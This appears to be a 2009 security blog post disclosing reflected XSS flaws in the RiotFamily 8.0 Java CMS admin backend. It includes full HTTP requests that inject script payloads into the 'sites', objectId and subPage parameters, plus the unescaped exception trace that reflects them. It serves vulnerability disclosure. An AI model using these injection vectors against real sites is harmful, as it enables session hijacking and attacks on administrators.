RiotFamily release 8 XSS

After a few months of security research inactivity, due to lack of time, I’m back guys.

In these days I’m playing with RiotFamily (release 8.0), a powerful JEE based Content Management System developed by Felix Gnass and open to the public. It is based on rock-stable technologies that we all use developing Java based web apps, such as Spring, Hibernate, Freemarker, and DWR for Ajax.

They made a lot of improvement from the previous version 7, especially in the admin backend.

Well I have the time to run it locally on my Tomcat instance and play a bit lookin for security issues…here we go:

1. Reflected XSS in <yourApp>/riot/form/riotUser when adding a new user to the Riot backend. Following the row request complete with the trivial attack vector I’ve used:

POST /riot8/riot/form/riotUser HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5)
Gecko/2009010711 Gentoo Firefox/3.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://localhost:8080/riot8/riot/form/riotUser
Cookie: JSESSIONID=DE70D674365E74CDAD6CA176747FD244;
Content-Type: multipart/form-data; boundary=------------------
---------169054938890117057438849259
Content-Length: 838
-----------------------------169054938890117057438849259
Content-Disposition: form-data; name="id"
aaa
-----------------------------169054938890117057438849259
Content-Disposition: form-data; name="name"
aaa
-----------------------------169054938890117057438849259
Content-Disposition: form-data; name="email"
aaa@aal.lo
-----------------------------169054938890117057438849259
Content-Disposition: form-data; name="p3"
aaa
-----------------------------169054938890117057438849259
Content-Disposition: form-data; name="p3-confirm"
aaa
-----------------------------169054938890117057438849259
Content-Disposition: form-data; name="sites"
1f67g<sCript>alert(666)</ScriPt>74jhskm3
-----------------------------169054938890117057438849259
Content-Disposition: form-data; name="p5"
Save
-----------------------------169054938890117057438849259--

as you can see we’ve modified the original POST request (the one to add a user to the DB) injecting after the value 1 of the form part “sites ” (a normal checkbox) a malicious (even if only to test purposes) JavaScript payload that shows a 666 popup. It works even throwing a java.lang.NumberFormatException.

This is basically the same problem I’ve found in Eclipse BIRT a few months ago (now fixed): the Exception trace is not escaped for HTML characters, as you can see here:

java.lang.NumberFormatException: For input string:
"1f67g<sCript>alert(666)</ScriPt>74jhskm3"
 at java.lang.NumberFormatException.forInputString(NumberFormatException.java:48)
 at java.lang.Integer.parseInt(Integer.java:456)
 at java.lang.Integer.parseInt(Integer.java:497)
 at org.riotfamily.forms.element.select.AbstractMultiSelectElement
.updateSelection(AbstractMultiSelectElement.java:161)
 at org.riotfamily.forms.element.select.AbstractMultiSelectElement
.processRequest(AbstractMultiSelectElement.java:141)
 at org.riotfamily.forms.CompositeElement.processRequestCompontents(CompositeElement
.java:142)
 at org.riotfamily.forms.CompositeElement.processRequest(CompositeElement.java:131)
 at org.riotfamily.forms.Form.processRequest(Form.java:396)
 at org.riotfamily.forms.Form.processRequest(Form.java:387)
 at org.riotfamily.forms.controller.AbstractFormController
.processForm(AbstractFormController.java:239)
 at org.riotfamily.forms.controller.AbstractFormController
.handleFormRequest(AbstractFormController.java:132)
 at org.riotfamily.forms.controller.AjaxFormController
.handleFormRequest(AjaxFormController.java:69)
 at org.riotfamily.forms.controller.AbstractFormController
.handleRequest(AbstractFormController.java:123)

Same problem in the path servlet request URI, in the objectId and subPage parameters:

GET /riot8/riot/path?editorId=messageBundleEntry
              &objectId=1o92<script>alert(1)</script>73j HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5)
 Gecko/2009010711 Gentoo Firefox/3.0.5

[..]

GET /riot8/riot/path?editorId=dbMessages
     &subPage=importMessagesac210<script>alert(1)</script>748djna HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.5)
Gecko/2009010711 Gentoo Firefox/3.0.5

Have fun guys…

euronymous

This entry was posted on Tuesday, March 10th, 2009 at 1:47 pm . You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

One Response to “RiotFamily release 8 XSS”

Leave a Reply